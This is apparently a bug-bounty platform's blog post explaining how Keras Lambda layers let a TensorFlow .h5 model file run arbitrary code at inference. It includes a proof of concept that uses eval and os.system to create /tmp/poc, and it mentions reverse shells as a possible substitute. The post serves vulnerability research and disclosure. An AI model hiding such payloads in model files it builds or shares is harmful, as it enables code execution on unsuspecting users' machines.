Exposing Keras Lambda Exploits in TensorFlow Models

In this blog, we’re breaking down one of our example Model File Vulnerabilities (MFVs) to help you understand how a trusted tool like TensorFlow—with its Keras Lambda layers—can be exploited. This example is a perfect starting point if you're looking to find and report your own MFVs.
The Vulnerability Explained
TensorFlow allows you to save neural network models with Keras Lambda layers, which enable custom logic via Python code. While these layers add flexibility to your model, they also let you embed any Python code. That means a malicious actor can hide dangerous payloads in what looks like a normal model file. When the model is used for inference, the hidden code is executed immediately on the victim’s machine.
The Technical Breakdown
How It Works
When you save a TensorFlow model that uses a Keras Lambda layer, the Python function inside that layer is serialized into the resulting HDF5 file (commonly with a `.h5` extension) alongside the model's architecture and weights. During inference, when the model is loaded and executed, this code runs, often without any obvious sign of trouble. An attacker can leverage this behavior to embed arbitrary OS commands that execute as soon as the model is run.
The Proof-of-Concept (PoC)
Our PoC demonstrates how this vulnerability can be exploited. In this example, a malicious Lambda layer is used to execute a system command that creates a file (`/tmp/poc`) when the model is loaded and inference is performed.
Step 1: Crafting the Malicious Model
In the snippet below, the Lambda layer is defined with a function that uses `eval` to execute a system call. When the model is saved, the malicious code is embedded within the `.h5` file.
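Here is a minimal sketch of what such a snippet could look like, assuming a TF 2.x environment; the input shape, the model wiring, and the file name `malicious_model.h5` are illustrative choices, while the `touch /tmp/poc` payload mirrors the PoC described above:

```python
import tensorflow as tf

# Payload: eval() resolves to an os.system() call that creates /tmp/poc.
# Any shell command could be substituted here.
payload = lambda x: eval("__import__('os').system('touch /tmp/poc')") or x

# A tiny, innocuous-looking model that wraps the payload in a Lambda layer.
inputs = tf.keras.Input(shape=(4,))
outputs = tf.keras.layers.Lambda(payload)(inputs)
model = tf.keras.Model(inputs, outputs)

# Saving in HDF5 format serializes the lambda's Python code into the file.
# The file name "malicious_model.h5" is only an example.
model.save("malicious_model.h5")
```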
Step 2: Triggering the Payload
When the model is loaded and inference is run, the malicious code in the Lambda layer executes automatically, creating `/tmp/poc` on the victim's machine. In a real-world scenario, an attacker could replace this benign command with something far more damaging, such as launching a reverse shell or modifying system files.
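A matching sketch of the victim side, assuming the file produced in Step 1 is named `malicious_model.h5` (the dummy input is likewise illustrative; depending on the Keras version, loading a Lambda layer from a saved model may emit a warning or require explicitly opting into unsafe deserialization):

```python
import numpy as np
import tensorflow as tf

# Load the attacker-supplied file exactly as an unsuspecting user would.
model = tf.keras.models.load_model("malicious_model.h5")

# A normal-looking inference call. The Lambda body runs as part of the
# forward pass, so the hidden eval() fires and /tmp/poc appears on disk.
dummy_input = np.zeros((1, 4), dtype=np.float32)
print(model.predict(dummy_input))
```

From the victim's point of view this is an ordinary load-and-predict workflow that returns ordinary-looking output, which is exactly why the payload is so easy to miss.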
Why This Matters
For bug bounty hunters, this isn’t just an academic example—it's a prime opportunity to cash in on the vulnerabilities lurking in AI/ML tools. Here’s why:
- A Launchpad for Discovery: Use this PoC as a springboard. Dig into other model formats and custom layers; you’re bound to uncover similar, exploitable flaws.
- Lucrative Bounties: With huntr offering up to $3,000 per validated MFV, each discovery not only boosts your reputation but also adds to your earnings.
Conclusion
The Keras Lambda layer vulnerability demonstrates that AI/ML models are more than just data—they can serve as conduits for executing arbitrary code. By understanding how this exploit works, you can better scout for similar vulnerabilities and help secure the ecosystem while earning rewards.
If you’ve discovered a new way to exploit model files or have a fresh twist on this vulnerability, submit your proof-of-concept and detailed report. Happy hunting!
